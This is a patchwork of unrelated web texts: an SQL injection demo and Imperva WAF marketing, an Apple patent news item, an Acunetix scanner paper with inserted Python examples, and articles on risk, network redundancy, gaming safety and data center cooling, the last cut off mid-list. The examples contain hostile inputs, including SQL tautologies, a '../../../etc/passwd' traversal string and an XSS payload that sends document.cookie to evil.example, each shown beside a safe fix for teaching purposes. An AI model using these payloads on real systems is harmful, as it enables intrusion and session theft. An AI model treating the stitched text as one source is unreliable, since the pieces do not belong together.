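```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE items (id INTEGER, name TEXT);
    INSERT INTO items VALUES (999, 'Widget'), (1000, 'Gadget');
""")

item_id = "999 OR 1=1"  # hostile input lifted from the query string

# Vulnerable: the input becomes part of the SQL text, so OR 1=1 executes.
leaked = conn.execute(
    "SELECT name FROM items WHERE id = " + item_id).fetchall()

# Safe: the placeholder sends the input as a bound value, never as SQL.
bound = conn.execute(
    "SELECT name FROM items WHERE id = ?", (item_id,)).fetchall()

print(len(leaked), len(bound))  # 2 0
```

The concatenated query returns every row because the injected OR 1=1 executes as SQL; the parameterized version matches nothing, since the whole hostile string is compared as a single value for id.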
For this reason, a web application firewall (WAF) is commonly employed to filter out SQLI, as well as other online threats. To do so, a WAF typically relies on a large, and constantly updated, list of meticulously crafted signatures that allow it to surgically weed out malicious SQL queries. Usually, such a list holds signatures to address specific attack vectors and is regularly patched to introduce blocking rules for newly discovered vulnerabilities.
Modern web application firewalls are also often integrated with other security solutions. From these, a WAF can receive additional information that further augments its security capabilities.
For example, a web application firewall that encounters a suspicious, but not outright malicious input may cross-verify it with IP data before deciding to block the request. It only blocks the input if the IP itself has a bad reputational history.
Imperva cloud-based WAF uses signature recognition, IP reputation, and other security methodologies to identify and block SQL injections, with a minimal amount of false positives. The WAF’s capabilities are augmented by IncapRules—a custom security rule engine that enables granular customization of default security settings and the creation of additional case-specific security policies.
Our WAF also employs crowdsourcing techniques that ensure that new threats targeting any user are immediately propagated across the entire user-base. This enables rapid response to newly disclosed vulnerability and zero-day threats.
Adding Data-Centric Protection for Defense in Depth
The optimal defense is a layered approach that includes data-centric strategies that focus on protecting the data itself, as well as the network and applications around it. Imperva Database Security continuously discovers and classifies sensitive data to identify how much sensitive data there is, where it is stored, and whether it’s protected.
In addition, Imperva Database Security actively monitors data access activity to identify any data access behavior that is a risk or violates policy, regardless of whether it originates with a network SQL query, a compromised user account, or a malicious insider. Receive automatic notification of a security event so you can respond quickly with security analytics that provides a clear explanation of the threat and enables immediate initiation of the response process, all from a single platform.
Database security is a critical last line of defense to preventing hacks like SQLi. Imperva’s unique approach to protecting data encompasses a complete view of both the web application and data layer. | <urn:uuid:10f046a3-4570-4953-8506-13cef1fb4180> | CC-MAIN-2022-40 | https://www.imperva.com/learn/application-security/sql-injection-sqli/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00087.warc.gz | en | 0.893322 | 2,570 | 3.328125 | 3 |
Apple has developed a new digital content authoring tool, which allows developers with little programming background to build iOS applications.
The patent application, entitled "Content Configuration for Device Platforms", details how users can create content without even accessing computer code, according to Apple Insider.
The patent application states that computer programming languages are a "hindrance to content creation", confusing many talented content creators and designers.
To address the situation, Apple has come up with software that relies on a graphical user interface.
This tool is similar to the ones used for webpage development. Apple also plans to help iOS developers check their content, on multiple screens, with various resolutions. This includes even the wider displays of computers or TVs.
Currently, iOS apps can be made for iPhone, iPad or both.
"Due to such diverse devices having such diverse capabilities, content must now be created not only once, but often several times so that it can be configured for multiple device types", says the patent application.
"This development has introduced a new barrier to content creation and delivery," Apple says. To ease the lives of developers, the company suggests that the "lowest-common denominator approach" is the solution.
Source: Apple Insider
Written by Angel Rajan and Emre Erturk. (https://arxiv.org/ftp/arxiv/papers/1706/1706.08017.pdf)
Cloud security is one of the biggest concerns for many companies. The growth in the number and size of websites increases the need for better securing those websites. Manual testing and detection of web vulnerabilities can be very time consuming. Automated Web Vulnerability Scanners (WVS) help with the detection of vulnerabilities in web applications. Acunetix is one of the widely used vulnerability scanners. Acunetix is also easy to implement and to use. The scan results not only provide the details of the vulnerabilities, but also give information about fixing the vulnerabilities. AcuSensor and AcuMonitor (technologies used by Acunetix) help generate more accurate potential vulnerability results. One of the purposes of this paper is to orient current students of computer security with using vulnerability scanners. Secondly, this paper provides a literature review related to the topic of security vulnerability scanners. Finally, web vulnerabilities are addressed from the mobile device and browser perspectives.
With the advancements in cloud computing, web services, and browser-based applications, most businesses rely on conducting their communications and transactions online. However, these websites and web applications are not completely secure. Around 30,000 websites are attacked every day (Lyne, 2013), and one out of every three websites is vulnerable to hacking (Schupak, 2015). Moreover, ninety percent of passwords are vulnerable to being stolen (Warman, 2013). The increasing number of websites and online applications increases the urgency of securing them.
Web security scanners are automated tools that examine websites or web applications for security vulnerabilities without accessing the application’s source code (Saeed, 2014). Web vulnerability scanners help to find vulnerabilities in web applications and websites. A security vulnerability is a weakness that may be exploited to cause damage, but its presence does not cause harm by itself (Jeeva, Raveena, Sangeetha, & Vinothini, 2016). Grabber, Vega, Acunetix, and Wapiti (InfoSec Institute, 2014) are a few examples of web vulnerability scanners.
The Cloud Security Alliance (2016) has recently identified twelve major types of security concerns and threats. Many of these are relevant to areas where web vulnerability scanners may be helpful in reducing risks. For example, two of these concerns, insecure APIs and insufficient due diligence, may be overlooked by web developers and web masters.
This report focuses on Acunetix, one of the most widely used web vulnerability scanners. It begins with a description of Acunetix and the details of the version used for this case study. The report then explains how Acunetix works, with supporting screenshots. In the next section, a few high-priority vulnerabilities identified by Acunetix are described. The AcuSensor and AcuMonitor technologies implemented by Acunetix are also discussed, followed by the advantages and disadvantages of Acunetix. Finally, the report closes with some recommendations and a conclusion.
Acunetix is an automated web vulnerability scanner which scans any web application or website that uses the HTTP or HTTPS protocols and is accessible through a web browser. It audits websites by identifying vulnerabilities such as SQL injection, cross-site scripting, and others.
The following table (Table 1) gives the version, cost, and other details of the Acunetix installation used for this paper. The websites used in the walkthrough are test websites rather than organisational websites. Acunetix is available in four versions: online, standard, pro, and enterprise.
Table 1. Version and platform of Acunetix used
The address of the website or web application that needs to be scanned should be added as a target. A description of the website can also be given while adding the target. Figure 1 below is a screenshot of adding a target with a description.
After adding the target, the website is ready for scanning. As seen in Figure 2, options are available for setting the business criticality, scan speed, and other parameters. Websites and web applications can also be set up for continuous scanning.
As shown in Figure 3, Acunetix offers a feature which tries to log in automatically to the targeted website. To accommodate this feature, two options are available: the tester can either enter the username and password manually, or use a pre-recorded login sequence for auto login.
If the targeted web application uses PHP or .NET, the scan results can be improved by downloading and installing the appropriate AcuSensor. Figure 4 below shows the enabling of AcuSensor.
During scanning, Acunetix provides details such as scan progress, scan duration, number of requests sent, average response time, and information about the target. It also provides the latest detected vulnerabilities and their priorities. Based on the detected vulnerabilities, Acunetix gives the overall threat level of website or web application. Figure 5 shows a screenshot of Acunetix during a scan.
Once scanning is finished, the vulnerabilities detected by Acunetix are listed by priority. The list gives the name, URL, parameter, and status of each detected threat. Figure 6 shows a screenshot of the scan results, and Figure 7 shows the vulnerabilities identified during the scan.
Each detected vulnerability comes with a description, its impact, and useful tips for fixing it. Acunetix also provides the HTTP request that was sent, which can help in fixing and testing the particular vulnerability. Figure 8 below shows the description and impact of the "weak password" vulnerability.
Scan reports can be generated from the scan results. Reports are available in different templates, such as affected items, developer, and executive summary, and several compliance reports can also be generated. All generated reports are available under the reports tab and can be downloaded later. Figure 9 shows the options for generating reports.
Two scans of a single target can be compared, and a comparison report is generated by Acunetix. This can help to verify that fixes for the threats are working correctly and that they do not introduce new vulnerabilities. Figure 10 below shows the selection of two scans on the same target, which enables the "compare scans" button.
A few high-priority vulnerabilities detected by Acunetix include Cross-Site Scripting (XSS), SQL injection, blind SQL injection, and directory traversal.
XSS is the insertion of malicious code into a victim’s web application so that, when a victim browses the web application, the malicious script is executed (Gupta & Gupta, 2015). A hacker injects malicious code into dynamic websites, and when the code is executed in the web browser, it changes the web pages (Jasmine, Devi, & George, 2017). The goal of an XSS attack is to gain access to the client’s cookies or any other sensitive information used to authenticate the client to the website (Jasmine, Devi, & George, 2017).
When users visit a website, their browsers send HTTP requests, in which the headers include information about their browsers and operating systems. Based on this information, the users may be directed to the mobile version of website that, along with different content, may have different vulnerabilities. This has significant implications while trying to identify XSS issues. For this reason, Acunetix aims to crawl different versions of each website with different user agents.
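To make the reflected XSS pattern described above concrete, the following sketch (illustrative only; not taken from the paper, and the function names are invented) contrasts a handler that interpolates user input directly into HTML with one that escapes it first:

```python
import html

def vulnerable_page(search_term: str) -> str:
    # UNSAFE: user input is interpolated directly into the HTML response,
    # so a term like <script>...</script> executes in the victim's browser.
    return f"<p>Results for: {search_term}</p>"

def safe_page(search_term: str) -> str:
    # SAFE: html.escape() converts <, >, & and quotes into HTML entities,
    # so the payload is rendered as inert text instead of executing.
    return f"<p>Results for: {html.escape(search_term)}</p>"

# A typical cookie-stealing payload of the kind the paper describes.
payload = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
print(vulnerable_page(payload))  # the <script> tag survives -> would run in a browser
print(safe_page(payload))        # &lt;script&gt;... -> harmless text
```

In a real application the escaping would usually be done by the templating engine, but the principle is the same: never emit raw user input into a page.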
A SQL injection vulnerability can cause the exposure of all sensitive data, including usernames, passwords, and credit card details, in a web application’s database (Khalid & Yousif, 2016). The attacker tries to insert fragments of malicious SQL commands into the application using special variables. The web application in turn sends these malicious commands to the target database on the server, which executes them for a different purpose within a legitimate query (Abdulqader, Thiyab, & Ali, 2017). A blind SQL injection involves asking the database a series of true-or-false questions in order to get closer to the vulnerable code itself. It is important to note that identifying vulnerable code may not be sufficient for hackers on its own. Additionally, phishing is often used to obtain other user details (Erturk, 2012). These details can then be used as part of an SQL injection attack to extract unauthorized information from an online database.
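The tautology-style injection described above can be demonstrated with a small, self-contained sketch (a hypothetical example using SQLite, not from the paper), along with the parameterized-query defense:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)",
                 [("alice", "s3cret"), ("bob", "hunter2")])

attacker_input = "' OR '1'='1"

# UNSAFE: string interpolation lets the quote break out of the literal,
# turning the WHERE clause into a tautology that matches every row.
unsafe_sql = f"SELECT name FROM users WHERE name = '{attacker_input}'"
print(conn.execute(unsafe_sql).fetchall())   # every user is returned

# SAFE: a parameterized query treats the entire input as a single value,
# so the quote characters never reach the SQL parser as syntax.
safe_rows = conn.execute(
    "SELECT name FROM users WHERE name = ?", (attacker_input,)
).fetchall()
print(safe_rows)                             # []
```

The same placeholder mechanism exists in PHP (PDO prepared statements) and .NET (parameterized commands), the two platforms AcuSensor targets.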
Directory traversal (also known as path traversal) can be defined as an attack that “aims to access files and directories that are stored outside the web root folder” (OWASP, 2015). This vulnerability can exist in the web server or web application code. This allows the attacker to access parts of directories which are restricted, and to execute commands on the web server.
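A minimal illustration of the traversal check a web application might perform — the web root path and helper function here are invented for this example, not taken from any real server:

```python
import os
from typing import Optional

WEB_ROOT = "/var/www/html"

def resolve_request(requested_path: str) -> Optional[str]:
    """Map a requested file onto the web root, rejecting traversal attempts."""
    # Normalize away any ../ sequences, then confirm the result is still
    # inside the web root before touching the filesystem.
    candidate = os.path.normpath(
        os.path.join(WEB_ROOT, requested_path.lstrip("/"))
    )
    if candidate == WEB_ROOT or candidate.startswith(WEB_ROOT + os.sep):
        return candidate
    return None  # traversal attempt such as ../../etc/passwd

print(resolve_request("images/logo.png"))      # /var/www/html/images/logo.png
print(resolve_request("../../../etc/passwd"))  # None
```

The key point is that the check happens after normalization; comparing the raw request string against a blocklist of `../` patterns is easy to bypass with encodings.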
Acunetix uses technologies such as AcuSensor and AcuMonitor to achieve better scanning results. Acunetix AcuSensor Technology is a security technology that allows the identification of more vulnerabilities with fewer false positives. In addition, it indicates the exact location in the code where the vulnerability lies and reports debug information. This technology combines black-box scanning techniques with feedback from sensors placed inside the source code to achieve more accuracy. The screenshots below show the SQL injection (Figure 11) and PHP vulnerabilities (Figure 12) identified by the AcuSensor technology. It displays the stack trace of the SQL injection threat and the file name with line number for the PHP code injection, which helps developers to trace and fix vulnerabilities easily. It can also help developers to understand more about vulnerabilities, which in turn helps them to write more secure code.
Another technology used by Acunetix is AcuMonitor Technology. While testing web applications, normally the scanner sends a request to a target, receives a response, analyses that response, and raises an alert based on the analysis. Some vulnerabilities do not give a response to a scanner during testing (Out-of-band vulnerability testing), and therefore, are not detectable using the “request/response” testing model. Detecting these vulnerabilities requires an intermediary service that a scanner can access. Acunetix, combined with AcuMonitor, makes automatic detection of such vulnerabilities easy. AcuMonitor detects Out-of-band SQL Injection (OOB SQLi), Blind XSS (or Delayed XSS), SMTP Header Injection, Blind Server-side XML/SOAP Injection, Out-of-band Remote Code Execution (OOB RCE), Host Header Attack, Server-side Request Forgery (SSRF), and XML External Entity Injection (XXE) automatically (“AcuMonitor,” n.d.).
Acunetix allows multiple simultaneous scans, but this may require more time to complete the entire scanning process. The time to scan a particular website or web application depends on the technologies and complexity of the target. Acunetix also allows scanning for particular vulnerabilities, such as XSS, which can be selected when starting the scan. This is an advantage, as it is much quicker than a full scan and may help developers to concentrate on a particular vulnerability and fix it. Report generation is another good feature, which helps to reuse the scan results; different report templates provide results based on specific needs. Even though Acunetix reduces false positives, scanning results may still contain them. Developers need to double-check the scanning results and confirm that they are not false positives, which can be time consuming. If Acunetix provided a feature to mark false positives manually and exclude them from further scanning results, the results would be better, with fewer false positives.
Web Vulnerability Scanners (WVS) insert garbage values into the database while scanning (Suteva, Anastasov, & Mileva, 2014). A WVS performs automated scanning and carries out several operations on a database to identify SQL injection and other database-related threats. This can be an issue in a production environment, as many garbage values are inserted alongside the original data.
An automated vulnerability scanner sends thousands of web requests to the web server. In order to accelerate their scanning, vulnerability scanners tend to send these requests using multiple simultaneous connections. If a web server is incapable of handling all the requests, it may slow down, resulting in a denial of service (Darmanin, 2014). An automated WVS also allows deep scanning, where it tries to access all possible paths and links in a website. This can be an issue when crawling sensitive links: crawling a link such as "delete" can cause accidental deletion of important data (Darmanin, 2014).
Some websites allow sending emails, for example through a "contact us" form. While testing these websites, multiple emails can be sent to a particular address, amounting to a mass-mailing attack or mail flooding (Darmanin, 2014).
There are a few solutions available for the problems discussed above. Testing in a staging environment, instead of the production environment, can help prevent denial of service in the release environment (Darmanin, 2014). This also avoids the insertion of garbage values into the production database. The risk of denial of service in a production environment can also be reduced by lowering the scan speed. Using CAPTCHAs in forms that send emails will help prevent email flooding. Furthermore, a WVS like Acunetix allows sensitive links to be excluded from crawling (Darmanin, 2014).
Smartphones and tablets continue to pose risks to users in terms of web security. These devices typically handle different wireless connections, cached or saved passwords, and notes and emails containing private information. As these bits of data are stored on mobile devices, they may be exposed to theft through web browsers. The education sector comprises one of the largest and fastest-growing groups of mobile device users. School teachers, employees, and students constantly rely on their websites and online learning tools, and these frequently face security threats (Levin, 2017). More than ever, the users of educational information systems need to be more alert and better trained in security matters. IT support services for schools need to build their protective capacity and carry out new security practices. Mobile and web security aspects also need to be covered by analysts and developers of educational applications by making security a crucial requirement and design principle (Erturk, 2013).
Web Vulnerability Scanners (WVS) help to speed up the website and web application vulnerability testing process. Acunetix is a popular automated vulnerability scanner, which not only identifies vulnerabilities but also gives suggestions for solving them. AcuSensor technology also focuses on reducing the reporting of false positives for websites based on PHP and .NET technologies. Utilizing new behavioural analysis techniques in the future could make Acunetix even more accurate. Using Acunetix or a similar WVS is very useful for many web developers, since this type of tool makes the detection of threats easier for security novices. Using a trial version can be helpful in making the decision about how long a period to choose for a paid subscription. Different plans help users to choose a suitable subscription option according to their needs. Website and application developers can use a WVS during development and testing to ensure a secure web application before it is released into the production environment. This case study is helpful for orienting students with the basics of a WVS, with Acunetix as an example. Whereas some security solutions are geared towards examining organisational websites, other solutions may focus on managing the organisation’s mobile devices. It is useful both for app designers and for IT support to scan mobile devices to identify security vulnerabilities and to highlight insecure apps (Revankar, 2015). Further technical studies could compare different vulnerability scanners, their effectiveness, and their particular strengths, which in turn would help developers choose an appropriate WVS for each web application.
Abdulqader, F. B., Thiyab, R. M., & Ali, A. M. (2017). The impact of SQL injection attacks on the security of databases. In Proceedings of the 6th International Conference on Computing and Informatics (pp. 323-331).
Acunetix – Website security – keep in check with Acunetix. (n.d.). Retrieved from https://www.acunetix.com
AcuMonitor: For detecting an XXE attack, Blind XSS and SSRF – Acunetix. (n.d.). Retrieved from https://www.acunetix.com/vulnerability-scanner/acumonitor-technology/
Cloud Security Alliance. (2016). The Treacherous 12: Cloud Computing Top Threats. Retrieved from https://downloads.Cloudsecurityalliance.org/assets/research/top-threats/Treacherous-12_Cloud-Computing_Top-Threats.pdf
Darmanin, G. (2014, May 5). Negative impacts of automated vulnerability scanners and how to prevent them. Retrieved from https://www.acunetix.com/blog/articles/negative-impacts-automated-vulnerability-scanners-prevent/
Erturk, E. (2012). Two Trends in Mobile Malware: Financial Motives and Transitioning from Static to Dynamic Analysis. Infonomics Society.
Erturk, E. (2013). An intelligent and object-oriented blueprint for a mobile learning institute information system. International Journal for Infonomics (IJI), 6(3/4), 736-743.
Gupta, S., & Gupta, B. B. (2015). PHP-sensor. Proceedings of the 12th ACM International Conference on Computing Frontiers – CF ’15. doi:10.1145/2742854.2745719
InfoSec Institute. (2014, September 24). 14 best open source Web Application Vulnerability Scanners. Retrieved from http://resources.infosecinstitute.com/14-popular-web-application-vulnerability-scanners/#gref
Jasmine, M. S., Devi, K., & George, G. (2017). Detecting XSS based Web Application Vulnerabilities. International Journal of Computer Technology & Applications, 8(2), 291-297.
Jeeva, S., Raveena, K., Sangeetha, K., & Vinothini, P. (2016). Web Vulnerability Scanner using Software Fault Injection Techniques. International Journal of Advanced Research Trends in Engineering and Technology, 3(2), 637-649. Retrieved from https://www.researchgate.net/publication/303756552_WEB_VULNERABILITY_SCANNER_USING_SOFTWARE_FAULT_INJECTION_TECHNIQUES
Khalid, A., & Yousif, M. F. (2016). Dynamic analysis tool for detecting SQL injection. International Journal of Computer Science and Information Security, 14(2), 224-232. Retrieved from https://www.researchgate.net/publication/311081330_Dynamic_Analysis_Tool_for_Detecting_SQL_Injection
Levin, D. (2017, March 14). How Should We Address the Cybersecurity Threats Facing K-12 Schools? Retrieved from https://www.edtechstrategies.com/blog/how-should-we-address-cybersecurity-threats-facing-k-12-schools/
Lyne, J. (2013, September 6). 30,000 Web Sites hacked a day. How do you host yours? Retrieved from https://www.forbes.com/sites/jameslyne/2013/09/06/30000-web-sites-hacked-a-day-how-do-you-host-yours/#4d3626541738
OWASP [Open Web Application Security Project]. (2015, October 6). Path Traversal. Retrieved from https://www.owasp.org/index.php/Path_Traversal
Revankar, M. (2015, October 15). Mobile Device App Inventory Auditing with Nessus 6.5. Retrieved from https://www.tenable.com/blog/mobile-device-app-inventory-auditing-with-nessus-65
Saeed, F. A. (2014). Using WASSEC to evaluate commercial Web Application Security Scanners. International Journal of Soft Computing and Engineering, 4(1), 177-181. Retrieved from https://www.researchgate.net/profile/Fakhreldeen_Saeed2/publication/311310455_Using_WASSEC_to_Evaluate_Commercial_Web_Application_Security_Scanners/links/5879149c08ae9275d4d91b83/Using-WASSEC-to-Evaluate-Commercial-Web-Application-Security-Scanners.pdf
Schupak, A. (2015, March 24). One in three top websites at risk for hacking – CBS News. Retrieved from http://www.cbsnews.com/news/one-in-three-websites-at-risk-for-hacking/
Suteva, N., Anastasov, D., & Mileva, A. (2014, April). One unwanted feature of many Web Vulnerability Scanners. Paper presented at Proceedings of the 11th International Conference on Informatics and Information Technologies.
Warman, M. (2013, January 15). 90 per cent of passwords ‘Vulnerable to Hacking’- Business Insider. Retrieved from https://www.businessinsider.com.au/90-percent-of-passwords-vulnerable-to-hacking-2013-1?r=US&IR=T
Vulnerability x Threat = Risk
In order to understand risk, we must first understand the definitions of threat and vulnerability. A business risk results from significant conditions, events, circumstances, actions, or inactions that could adversely affect your company’s ability to achieve its objectives and execute strategies. Risk is a condition that results when vulnerabilities and threats act upon critical assets.
In information security, we like to use the formula “Vulnerability x Threat = Risk” to demonstrate this. So, what are threats and vulnerabilities?
What is Threat?
A threat is a potential event that could take advantage of your protected asset’s flaws and result in the loss of your security’s confidentiality, integrity, and/or availability (C-I-A). Threats result in non-desirable performance of critical assets. There’s always a potential flaw that could be exposed, and when a threat is identified, think about the way it could affect the pillars of security: integrity, availability, and confidentiality.
Think about this scenario: your organization is storing a box of hard-copy, paper patient records. The sprinklers in your building go off, and the records are soaked. You have to hire a company to come in, dry out the records, and restore them to a readable state. What security losses have you had? Availability, but also integrity, because the data has been damaged. It hasn’t been stolen, so there’s no loss of confidentiality, but the data is not usable because of water damage. We can’t have the full pillars of security if we can’t use the asset for the purpose it was intended.
Next, let’s think about the three types of threats:
- What are the natural threats? This could be anything like floods, earthquakes, or hurricanes.
- What are man-made threats to the assets we’re trying to protect? Man-made threats are categorized as either deliberate (intentional) or accidental.
- What about environmental threats? Could your asset be affected by environmental threat such as power failure, pollution, chemical damage, or water damage?
What is Vulnerability?
A vulnerability is a known or unknown flaw or weakness in an asset that could result in the loss of the asset’s integrity, availability, and/or confidentiality. An internal vulnerability could be a lack of security awareness training or no documentation for a critical process. Let’s go back to our paper records scenario. The flaws would be the fact that the print can fade over time, so it could be unusable in the future, or the fact that it has a finite location, so if it’s ever lost, that information is gone.
Threat identification and vulnerability identification are both integral parts of a risk assessment. Once you’ve identified your threats and vulnerabilities, you’ll be able to determine how to mitigate the negative impact of potential threats and vulnerabilities. Controls that you put into place should be based on an assessment of risk. For more details on how to complete a formally documented risk assessment, download our free Risk Assessment Guide.
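The “Vulnerability x Threat = Risk” formula can be applied as a simple scoring exercise. The sketch below is purely illustrative — the assets and the 1-5 scores are invented for this example — but it shows how multiplying threat likelihood by vulnerability severity ranks where mitigation effort should go first:

```python
# Illustrative only: assets and 1-5 scores are invented for this example.
# Risk = likelihood of the threat x severity of the vulnerability.
assets = {
    "paper patient records": {"threat_likelihood": 3, "vulnerability_severity": 4},
    "public web server":     {"threat_likelihood": 5, "vulnerability_severity": 3},
    "offsite backups":       {"threat_likelihood": 2, "vulnerability_severity": 2},
}

def risk_score(asset: dict) -> int:
    return asset["threat_likelihood"] * asset["vulnerability_severity"]

# Rank assets so mitigation effort goes to the highest risk first.
for name, attrs in sorted(assets.items(),
                          key=lambda kv: risk_score(kv[1]), reverse=True):
    print(f"{name}: risk {risk_score(attrs)}")
# public web server: risk 15
# paper patient records: risk 12
# offsite backups: risk 4
```

Real risk assessments use richer scales and qualitative judgment, but the ranking mechanic is the same.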
What is a threat? A threat is a potential source that could exercise, accidentally or intentionally, a specific vulnerability. What is a vulnerability? A vulnerability is a flaw or weakness in the system security procedures, design, implementation, or other controls that could be accidentally or intentionally exploited.
Network redundancy is a duplicated infrastructure where additional or alternate instances of network devices and connections are installed to ensure an alternate path in case of a failure on the primary service. This is how you keep your business online and available should your main path of communication go down.
While redundancy is great, many times services are in the same data center, share the same fiber bundle, patch panel or equipment. In fact, hardware failures and fiber cuts are the leading causes of network outages today.
Being redundant may not protect you as well as planned.
Network Redundancy vs. Network Diversity
A duplicate or alternate instance of your network doesn’t always protect you from the leading causes of network outages, and it can’t always protect you from less frequent, but more catastrophic incidents, like floods or fires. Sometimes construction work, human error and even squirrels can interrupt your network service. To protect against these scenarios, network diversity is the answer.
Network diversity takes redundancy one step further, duplicating your infrastructure on a geographically diverse path, in another data center or even in the cloud.
Achieving Network Diversity Through Geographic Redundancy
Diversity is key. Being geographically diverse protects you from weather events, construction and other single location incidents. If your redundant site is in a different state, or even in another country, your chances of two impacting events at the same time are significantly lessened. For even greater resiliency, you can move your redundancy or disaster recovery to the cloud via a Disaster Recovery as a Service solution.
Achieving Network Diversity via Multihomed BGP
You can achieve network diversity by being in geographically diverse data centers with the use of multihomed BGP. INAP offers the use of several BGP communities to ensure immediate failover of routing to your data center environment in case of a failure. Additionally, through INAP’s proprietary technology, Performance IP®, your outbound traffic is automatically put on the best-performing route.
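Conceptually, multihomed BGP failover amounts to always following the best available path and shifting automatically when a session drops. The toy model below (provider names and local-preference values are invented; this is not INAP or vendor configuration) illustrates the idea:

```python
# Conceptual model of multihomed failover: among the BGP sessions that are
# still up, traffic follows the path with the highest local preference.
routes = [
    {"provider": "carrier-a", "local_pref": 200, "up": True},   # primary
    {"provider": "carrier-b", "local_pref": 100, "up": True},   # backup
]

def best_path(routes):
    available = [r for r in routes if r["up"]]
    if not available:
        return None  # no session up -> no path to the destination
    return max(available, key=lambda r: r["local_pref"])

print(best_path(routes)["provider"])   # carrier-a while the primary is up

routes[0]["up"] = False                # primary session fails
print(best_path(routes)["provider"])   # traffic shifts to carrier-b
```

Real BGP best-path selection involves many more tie-breakers (AS-path length, MED, and so on), but local preference is the usual knob for expressing a primary/backup policy.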
Achieving Network Diversity Through Interconnection
Another consideration is the connection from the data center to your central office. One might assume that having two different last-mile providers for your redundancy means they use different paths. This is usually not the case; many fiber vaults and manholes are shared. As a result, both your primary and backup services can be impaired when a backhoe unearths an 800-strand fiber. Ask the provider to share the circuit path to ensure your services are on diverse paths. INAP works to avoid these issues by offering high-capacity metro network rings in key markets. Metro Connect interconnects multiple data centers with diverse paths, allowing you to avoid single points of failure for your egress traffic.
Redundancy is key to maintaining the demanding uptime of today’s businesses. In most cases this does the job; however, if your model is 100 percent uptime, it may be beneficial to start investing in a diverse infrastructure as well.
Over the past several decades, online gaming has evolved into one of the most popular entertainment industries in the world. However, with many advancements and improvements also comes new dangers. Online gaming now often includes multiplayer options that involve unique safety concerns. Features like video chatting, file sharing, and personal data sharing can make players more susceptible to cyber threats, cyberbullying or even malware attacks. With these threats in mind, it’s important to know how to stay safe while online gaming.
Online gaming dangers
Online gaming involves specific dangers, even ones that might be unexpected. While some games might be safe for children from a content standpoint, multiplayer chats or webcam access can open them up to risk. From educational games to adventure games, online gaming dangers include:
- Privacy problems
- Webcam hacking
- Hidden fees or scams
- Age-inappropriate content
Cyberbullying can be a risk for any online gamers, especially young adults and children. The anonymity of players and the use of avatars can be a fun way to create alter-egos or fictional versions of themselves, but it also comes with risks. Online gamers can use this anonymity to harass, bully and harm other players. Cyberbullying can happen either by direct message or in public chat channels.
When gaming online, it’s important to protect your privacy. Storing or using personal information on consoles, computers and other devices can put private data at risk. Using real names in online usernames or profiles can allow hackers and cybercriminals to easily gain access to personal information.
Many gaming devices and online games now include integrated video and microphone access. From laptops to tablets to smartphones, any device with a webcam may be at risk of hacking. Hackers can remotely control both webcams and microphones and exploit players.
Hidden fees and scams
Online gaming often includes hidden fees or other in-game costs that can add up. Young adults and children without supervision might overlook subscription fees and add-ons. One of the biggest concerns with online gaming purchases is that unsecured payment information could be obtained by hackers.
How to stay safe on online gaming
Luckily, while online gaming presents challenges and dangers, there are many solutions to ensure you or your child stay safe. Being aware of the dangers of online gaming is the first step to creating a safe online gaming experience. There are also specific steps you can take to secure your private information and protect against cyberbullying.
Block or report bullies
If your children enjoy online gaming, you should be aware of ways to prevent or stop cyberbullying. Before letting your child participate in online gaming, make sure they know safe digital behavior. Clicking on links from strangers or participating in bullying of other players is unsafe and likely violates the game’s terms of service. Some games allow you to block all direct messaging from other users and most games will allow you to block and report individuals engaging in cyberbullying.
Protect personal information
Avoid sharing personal information when online gaming to prevent hacking. When creating usernames, gamers should choose something that doesn’t include their first or last name or other personal information like birth dates. Create strong and unique passwords to avoid the risk of being hacked.
To help mitigate the risk of hackers controlling your device’s microphone or webcam, you can often install cybersecurity software that will check for malware, depending on your gaming device of choice. Ensuring that all webcams are set to “off” as their default and using physical camera covers are more ways to protect yourself from hackers.
Before you donate or sell old devices, remember to always delete all personal information first and reset the device. Having names, addresses or payment information on these devices can put you at risk.
Do your research
Adults should always research games before letting their child play to ensure the content is age-appropriate. Different types of game ratings can let you know the intended age range for an online game. For example, games rated “E” are typically suitable for all ages. To ensure your child doesn’t view inappropriate material, you can play the game with your child or on your own first to explore all aspects of the game beforehand.
When choosing which games to let your child play, you can also check to see if they include multiplayer options. Online games that allow playing with strangers and have chat functions may be better to avoid for young children.
Following online gaming safety protocols can help prevent everything from cyberbullying to stolen personal and financial information. Using these tips will help make online gaming a safer and more enjoyable experience for you or your children. To learn more about online gaming, explore the CenturyLink Gaming Hub for tips on improving internet speed for gaming and more. | <urn:uuid:a008e284-edf6-425e-9f7d-19beba3ae2e9> | CC-MAIN-2022-40 | https://discover.centurylink.com/online-gaming-safety.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00288.warc.gz | en | 0.917459 | 988 | 2.6875 | 3 |
For most data centers, cooling used to be pretty straightforward: A CRAC unit kept the server room cold enough that staff often wear sweaters to work no matter the outside temperature. But, the nature of data centers has changed significantly in the last decade. More applications require high-density cooling because rack densities continue to increase. The thermal design power (TDP) of chips has risen almost 50%, using more power and generating more heat.
In 2016, global data centers spent $8 billion to cool their data centers, and, if not kept in check, that is expected to reach $20 billion by 2024. This is due to the sheer amount of data being used and in need of a place to be stored: 175 zettabytes by 2025. So what is the best way to cool the data centers that are storing this mission critical information?
The two most common air-cooling methods are CRACs and CRAHs. In these systems, air is used to cool the entire room or individual racks/rows. CRACs are similar to a home air conditioner — air flows across cooled refrigerant and then blown into the room. CRAHs use chilled water, which requires a chiller.
• Require a specific layout, including raised floors and spaced racks.
• Have a lot of moving parts, which use space and require maintenance, including compressors or chillers, air handlers, humidity controls, air filters, and backup generators.
• Require aisle containment, which takes up space that could be used for more equipment.
• Are prone to developing hot spots, which threaten sensitive IT equipment.
• Are not the most efficient heat removal method.
• Require access to significant power, making it a poor choice for data centers in remote locations or edge data centers.
• Expose IT equipment to airborne contaminants and to the adverse effects of the air itself, including corrosion and oxidation.
• Can damage IT equipment as a result of the vibrations of the server fans
The two most common liquid cooling methods are single-phase immersion and liquid to chip. Single-phase liquid immersion uses a dielectric fluid surrounding the servers, which transfers the heat by circulating through a cooling distribution unit that disperses the heat and returns the cooled liquid back into the compartment. Liquid-to-chip cooling, also called direct-to-chip or cold plate cooling, uses coolant on a cold plate inside the server and a chilled water loop to carry the heat outside.
